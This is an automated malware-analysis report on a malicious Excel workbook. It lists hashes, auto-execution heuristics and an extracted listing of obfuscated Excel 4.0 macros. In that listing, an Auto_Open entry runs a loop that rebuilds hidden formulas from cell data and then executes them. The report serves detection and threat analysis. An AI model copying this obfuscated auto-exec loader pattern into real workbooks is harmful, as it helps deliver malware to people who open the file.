Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ff8abae6794baeba…

MALICIOUS

Office (OLE)

35.5 KB Created: 2020-11-25 10:43:22 Authoring application: Microsoft Excel First seen: 2021-01-11
MD5: 9d9f048fbd880101ba6a2601ae71a374 SHA-1: 4c654acef6726c4e358de7ce3543832d14eafe2a SHA-256: ff8abae6794baeba33c0a91789ac4a053c56c532522b3aaf7915621ded0b5b5a
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6387 bytes
SHA-256: 7eed346c34bd068399342dd4f520d1bb6cf6d5ef0952100356df2acb1b98a60f
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  jqIH
' 0018     23 LABEL : Cell Value, String Constant - AjtvKkBJ len=0 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!G133 
' 0018     20 LABEL : Cell Value, String Constant - BOdsq len=0 
' 0018     25 LABEL : Cell Value, String Constant - BXcMvgUJXP len=0 
' 0018     23 LABEL : Cell Value, String Constant - CVcHxBvP len=0 
' 0018     21 LABEL : Cell Value, String Constant - cyGDfd len=0 
' 0018     21 LABEL : Cell Value, String Constant - eaUhza len=0 
' 0018     26 LABEL : Cell Value, String Constant - ECQZgRKRnvI len=0 
' 0018     23 LABEL : Cell Value, String Constant - imnPhEZv len=0 
' 0018     22 LABEL : Cell Value, String Constant - ItZBXbw len=0 
' 0018     21 LABEL : Cell Value, String Constant - KmLNSc len=0 
' 0018     21 LABEL : Cell Value, String Constant - NUqwDW len=0 
' 0018     23 LABEL : Cell Value, String Constant - NZqAIBtt len=0 
' 0018     27 LABEL : Cell Value, String Constant - ovFKIJqMvFuD len=0 
' 0018     22 LABEL : Cell Value, String Constant - PcdsSwn len=0 
' 0018     20 LABEL : Cell Value, String Constant - PjudP len=0 
' 0018     27 LABEL : Cell Value, String Constant - SoxSnbPcFZPb len=0 
' 0018     24 LABEL : Cell Value, String Constant - tMQMkCnhf len=0 
' 0018     25 LABEL : Cell Value, String Constant - XICNaOaWwo len=0 
' 0018     24 LABEL : Cell Value, String Constant - yoejgKgcH len=0 
' 0018     27 LABEL : Cell Value, String Constant - ZoZOZrBIFuxR len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  jqIH,G52,"SET.NAME("ItZBXbw",VALUE("0"))",""
'  jqIH,G54,"SET.NAME("BXcMvgUJXP",ItZBXbw)",""
'  jqIH,G56,"SET.NAME("AjtvKkBJ",ItZBXbw)",""
'  jqIH,G60,"SET.NAME("tMQMkCnhf",COUNTA(cyGDfd))",""
'  jqIH,G63,"SET.NAME("BOdsq",COUNTA(yoejgKgcH))",""
'  jqIH,G67,[],""
'  jqIH,G69,"SET.NAME("CVcHxBvP","")",""
'  jqIH,G72,"BXcMvgUJXP",""
'  jqIH,G76,"SET.NAME("XICNaOaWwo",HLOOKUP("*",cyGDfd,BXcMvgUJXP,FALSE))",""
'  jqIH,G78,"eaUhza",""
'  jqIH,G80,"SET.NAME("ECQZgRKRnvI",ItZBXbw)",""
'  jqIH,G83,[],""
'  jqIH,G88,"ECQZgRKRnvI",""
'  jqIH,G92,"SoxSnbPcFZPb",""
'  jqIH,G97,"NZqAIBtt",""
'  jqIH,G100,"ZoZOZrBIFuxR",""
'  jqIH,G103,"SET.NAME("PcdsSwn",VALUE(HLOOKUP("*",yoejgKgcH,ZoZOZrBIFuxR,FALSE)))",""
'  jqIH,G105,"KmLNSc",""
'  jqIH,G107,"CVcHxBvP",""
'  jqIH,G110,"AjtvKkBJ",""
'  jqIH,G113,NEXT(),""
'  jqIH,G118,"NUqwDW",""
'  jqIH,G121,"SET.NAME("f",INT(T(FORMULA(T(CVcHxBvP)&"",""&T(NUqwDW)))))",""
'  jqIH,G124,"ovFKIJqMvFuD",""
'  jqIH,G129,NEXT(),""
'  jqIH,G131,RETURN(),""
'  jqIH,G154,"SET.NAME("PjudP",G52)",""
'  jqIH,G159,"cyGDfd",""
'  jqIH,G164,"SET.NAME("yoejgKgcH",R51C15)",""
'  jqIH,G166,"SET.NAME("ovFKIJqMvFuD",173)",""
'  jqIH,G169,"SET.NAME("imnPhEZv",7)",""
'  jqIH,G172,PjudP(),""
'  jqIH,G173,HALT(),""